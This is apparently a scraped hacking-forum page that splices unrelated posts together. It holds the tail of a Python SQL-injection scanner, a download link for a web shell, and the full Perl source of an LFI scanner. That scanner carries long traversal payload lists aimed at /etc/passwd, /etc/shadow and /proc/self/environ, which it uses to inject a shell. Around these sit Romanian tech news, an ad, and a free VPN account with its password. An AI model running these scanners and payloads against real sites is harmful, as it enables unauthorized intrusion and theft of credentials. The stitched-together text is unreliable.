retVal[0] = getTextOnly(retVal[3]) return retVal def shallowCrawl(url): retVal = set([url]) page = retrieveContent(url)[3] for match in re.finditer(r"href\s*=\s*\"(?P[^\"]+)\"", page, re.I): link = urlparse.urljoin(url, match.group("href")) if link.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: if reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, link])): retVal.add(link) return retVal def scanPage(url): for link in shallowCrawl(url): print "* scanning: %s" % link for match in re.finditer(r"(?:[?&;])((?P\w+)=[^&;]+)", link): vulnerable = False tampered = link.replace(match.group(0), match.group(0) + "".join(random.sample(INVALID_SQL_CHAR_POOL, len(INVALID_SQL_CHAR_POOL)))) content = retrieveContent(tampered) for dbms in DBMS_ERRORS: for regex in DBMS_ERRORS[dbms]: if not vulnerable and re.search(regex, content[0], re.I): print " (o) parameter '%s' could be SQLi vulnerable! (%s error message)" % (match.group('parameter'), dbms) vulnerable = True if not vulnerable: original = retrieveContent(link) a, b = random.randint(100, 255), random.randint(100, 255) for prefix in PREFIXES: for boolean in BOOLEANS: for suffix in SUFFIXES: if not vulnerable: template = "%s%s%s" % (prefix, boolean, suffix) payloads = (link.replace(match.group(0), match.group(0) + (template % (a, a))), link.replace(match.group(0), match.group(0) + (template % (a, ))) contents = [retrieveContent(payloads[0]), retrieveContent(payloads[1])] if any(map(lambda x: original[x] == contents[0][x] != contents[1][x], [1, 2])) or len(original) == len(contents[0][0]) != len(contents[1][0]): vulnerable = True else: ratios = map(lambda x: difflib.SequenceMatcher(None, original[0], x).quick_ratio(), [contents[0][0], contents[1][0]]) vulnerable = ratios[0] > 0.95 and ratios[1] < 0.95 if vulnerable: print " (i) parameter '%s' appears to be SQLi vulnerable! (\"%s\")" % (match.group('parameter'), payloads[0]) if __name__ == "__main__": print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR) parser = optparse.OptionParser(version=VERSION) parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.target.com/page.htm?id=1\")") options, _ = parser.parse_args() if options.url: scanPage(options.url) else: parser.print_help() http://www.aftershell.com/2011/07/16/python-damn-small-sqli-scanner-dsss-v0-1b/
-
Color Scheme Designer 3 Color Combinations | Color Schemes | Color Palettes 40 Useful Online Generators For Web Designers - Noupe Design Blog CSSREMIX
-
Download link: Download: SyRiAn Sh3ll 7 ? Packet Storm Mirror: http://pastebin.com/qvS03QCD
-
This is a simple perl script called Viper LFI Scanner that enumerates local file inclusion attempts when given a specific target. Changes: New bypass method added and ability to read /etc/passwd. #!/usr/bin/perl # # //////////////////////////////////// # Viper LFI Scanner Ver. 4.0 # //////////////////////////////////// # # Title : Viper Lfi Scanner Ver. 4.0 # Author: Bl4ck.Viper # From : Azarbycan # Date : 2011/07/06 # Category : Scanner # Home : www.Skote-vahshat.com # Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com # # # Description :Log , Environ , Passwd File Scanner ,& new method for bypass passwd # # #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* use HTTP::Request; use LWP::UserAgent; system ("cls"); print "\t\t/////////////////////////////////////////////////\n"; print "\t\t_________________________________________________\n"; print "\t\t\t Viper LFI Scanner Ver. 3.0\n"; print "\t\t\t Coded By Bl4ck.Viper\n"; print "\t\t\t Made In Azarbycan\n"; print "\t\t\t Version In English\n"; print "\t\t_________________________________________________\n"; print "\n\n"; sleep (1); print "\t\t\t\t WELCOME\n"; print "\n\n"; menu:; print "\tMenu:\n"; print "\t ID[1]=>Passwd,Log"; print "\t[Scan Files Of /etc/ Directory]\n"; print "\t ID[2]=>Environ"; print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n"; print"\n"; print "\t\t Select ID For Start Scanner :"; $menu = <>; if ($menu =~ /1/){ goto lfi; } if ($menu =~ /2/){ goto env; } else { print"\n\n"; print "\t\tUnknow Command\n"; goto menu; }; lfi:; print "\n\n"; print "\t\t\tWelcome To /etc/ Section With New Method\n\n"; print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n"; print "\t Target :"; $host=<STDIN>; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; }; print "\n\n"; print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n"; print "\n\n"; @lfi = ('../etc/passwd', '../../etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd', '../../../../../../../../../../etc/passwd', '../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../../etc/passwd', '....//etc/passwd', '....//....//etc/passwd', '....//....//....//etc/passwd', '....//....//....//....//etc/passwd', '....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//....//etc/passwd', '....//....//....//....//....//....//....//....//....//....//etc/passwd', '../../etc/passwd%00', '../../../etc/passwd%00', '../../../../etc/passwd%00', '../../../../../etc/passwd%00', '../../../../../../etc/passwd%00', '../../../../../../../etc/passwd%00', '../../../../../../../../etc/passwd%00', '../../../../../../../../../etc/passwd%00', '../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../../../etc/passwd%00', '....//etc/passwd%00', '....//....//etc/passwd%00', '....//....//....//etc/passwd%00', '....//....//....//....//etc/passwd%00', '....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//....//....//etc/passwd%00', '....//....//....//....//....//....//....//....//....//....//etc/passwd%00', '../etc/shadow', '../../etc/shadow', '../../../etc/shadow', '../../../../etc/shadow', '../../../../../etc/shadow', '../../../../../../etc/shadow', '../../../../../../../etc/shadow', '../../../../../../../../etc/shadow', '../../../../../../../../../etc/shadow', '../../../../../../../../../../etc/shadow', '../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../../etc/shadow', '../etc/shadow%00', '../../etc/shadow%00', '../../../etc/shadow%00', '../../../../etc/shadow%00', '../../../../../etc/shadow%00', '../../../../../../etc/shadow%00', '../../../../../../../etc/shadow%00', '../../../../../../../../etc/shadow%00', '../../../../../../../../../etc/shadow%00', '../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../../etc/shadow%00', '../etc/group', '../../etc/group', '../../../etc/group', '../../../../etc/group', '../../../../../etc/group', '../../../../../../etc/group', '../../../../../../../etc/group', '../../../../../../../../etc/group', '../../../../../../../../../etc/group', '../../../../../../../../../../etc/group', '../../../../../../../../../../../etc/group', '../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../../etc/group', '../etc/group%00', '../../etc/group%00', '../../../etc/group%00', '../../../../etc/group%00', '../../../../../etc/group%00', '../../../../../../etc/group%00', '../../../../../../../etc/group%00', '../../../../../../../../etc/group%00', '../../../../../../../../../etc/group%00', '../../../../../../../../../../etc/group%00', '../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../../etc/group%00', '../etc/security/group', '../../etc/security/group', '../../../etc/security/group', '../../../../etc/security/group', '../../../../../etc/security/group', '../../../../../../etc/security/group', '../../../../../../../etc/security/group', '../../../../../../../../etc/security/group', '../../../../../../../../../etc/security/group', '../../../../../../../../../../etc/security/group', '../../../../../../../../../../../etc/security/group', '../etc/security/group%00', '../../etc/security/group%00', '../../../etc/security/group%00', '../../../../etc/security/group%00', '../../../../../etc/security/group%00', '../../../../../../etc/security/group%00', '../../../../../../../etc/security/group%00', '../../../../../../../../etc/security/group%00', '../../../../../../../../../etc/security/group%00', '../../../../../../../../../../etc/security/group%00', '../../../../../../../../../../../etc/security/group%00', '../etc/security/passwd', '../../etc/security/passwd', '../../../etc/security/passwd', '../../../../etc/security/passwd', '../../../../../etc/security/passwd', '../../../../../../etc/security/passwd', '../../../../../../../etc/security/passwd', '../../../../../../../../etc/security/passwd', '../../../../../../../../../etc/security/passwd', '../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../../etc/security/passwd', '../etc/security/passwd%00', '../../etc/security/passwd%00', '../../../etc/security/passwd%00', '../../../../etc/security/passwd%00', '../../../../../etc/security/passwd%00', '../../../../../../etc/security/passwd%00', '../../../../../../../etc/security/passwd%00', '../../../../../../../../etc/security/passwd%00', '../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../../../etc/security/passwd%00', '../etc/security/user', '../../etc/security/user', '../../../etc/security/user', '../../../../etc/security/user', '../../../../../etc/security/user', '../../../../../../etc/security/user', '../../../../../../../etc/security/user', '../../../../../../../../etc/security/user', '../../../../../../../../../etc/security/user', '../../../../../../../../../../etc/security/user', '../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../../etc/security/user', '../etc/security/user%00', '../../etc/security/user%00', '../../../etc/security/user%00', '../../../../etc/security/user%00', '../../../../../etc/security/user%00', '../../../../../../etc/security/user%00', '../../../../../../../etc/security/user%00', '../../../../../../../../etc/security/user%00', '../../../../../../../../../etc/security/user%00', '../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../../../etc/security/user%00'); foreach $scan(@lfi){ $url = $host.$scan; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;} else { $msg = "Not Found";} print "$scan..........[$msg]\n"; } env:; print "\n\n"; print "\t\t\tWelcom To Environ Section\n\n"; print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n"; print "\t Target :"; $host=<STDIN>; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; }; print "\n\n"; print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n"; print "\n\n"; @env = ('../proc/self/environ', '../../proc/self/environ', '../../../proc/self/environ', '../../../../proc/self/environ', '../../../../../proc/self/environ', '../../../../../../proc/self/environ', '../../../../../../../proc/self/environ', '../../../../../../../../proc/self/environ', '../../../../../../../../../proc/self/environ', '../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../../proc/self/environ', '../proc/self/environ%00', '../../proc/self/environ%00', '../../../proc/self/environ%00', '../../../../proc/self/environ%00', '../../../../../proc/self/environ%00', '../../../../../../proc/self/environ%00', '../../../../../../../proc/self/environ%00', '../../../../../../../../proc/self/environ%00', '../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../../proc/self/environ%00'); foreach $scan_env(@env){ $url = $host.$scan_env; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;} else { $msg = "Not Found";} print "$scan_env..........[$msg]\n"; } # Bl4ck.Viper Turkish Hacker # Copyright 2010 Black Viper Download link: LFI Scanner 4.0 ? Packet Storm
-
Studen?ii români au fost marile vedete ale cupei Imagine, organizate de gigantul IT Microsoft. Echipa româneasc? a câ?tigat sec?iunea Digital Media. Microsoft a apreciat modul în care tehnologia poate s? rezolve problemele actuale ale omenirii. Echipa Endeavour Design, format? din studen?i la Universitatea Tehnica Gheorghe Asachi din Ia?i, s-a f?cut remarcat? prin crearea unui robot autonom ce poate fi utilizat la opera?iuni de salvare. La edi?ia 2011 a cupei Imagine, au luat startul 350.000 de studen?i, grupa?i în echipe ce au luat parte la nou? sec?iuni. La patru dintre ele în final? au ajuns ?i studen?i români, iar echipa MNA a câ?tigat finala Digital Media. “Trebuie s? lucr?m împreun? pentru eliminarea s?r?cie ?i bolilor. Trebuie s? muncim împreun? pentru combaterea înc?lzirii globale ?i s? protej?m mediul. Voi concepe?i r?spunsuri la aceste întreb?ri dificile ?i numai prin imagina?ie ?i crea?ie” a declarat Michael Bloomberg, primarul ora?ului New York, la ceremonia de premiere. Românii au mai ca?tigat sectiuni ale Imagine Cup în 2004 ?i 2009. Anul acesta o echip? din Irlanda a luat marele premiu. Studen?i români premia?i de Microsoft: Tinerii au creat un robot ce poate fi utilizat la opera?iuni de salvare
-
Do It Yourself Business Websites. Easily create a beautiful, personalized business site that gets customers to your door. All Your Social Media Connect to all of your accounts in one place. Beautiful Design Keeping it simple is the secret to looking good. Insightful Analytics See who's visiting and watch as you drive more traffic over time. Hosting made easy Use the best tools without breaking the bank. Get Found Online Your dedicated page makes finding you online a snap. Stay Current Make sure people don't forget by using the latest tools. Tutorial Video: Create a Small Business Website with Central.ly on Vimeo Central.ly
-
http://rstcenter.com/forum/21625-%5Brst%5D-mail-tools.rst
-
- - user: tuvpnfreeproxy pass: Hdpsm6kY - - TUVPN.com - - bucharest.tuvpn.com (Romania) chicago.tuvpn.com (USA) london.tuvpn.com (UK) amsterdam.tuvpn.com (The Netherlands) madrid.tuvpn.com (Spain) steinsel.tuvpn.com (Luxembourg) kualalumpur.tuvpn.com (Malaysia) montreal.tuvpn.com (Canada) roubaix.tuvpn.com (France) erfurt.tuvpn.com (Germany) stockholm.tuvpn.com (Sweden) vpn.tuvpn.com (random connection to any of our nodes) tutorial firefox
-
pentru winamp era un plugin Download link: Download LED-KEYBOARD 2.0 iar ce cauti tu presupun ca sunt astea: http://www.youtube.com/watch?v=VhNqp3zUrRw&feature=fvwrel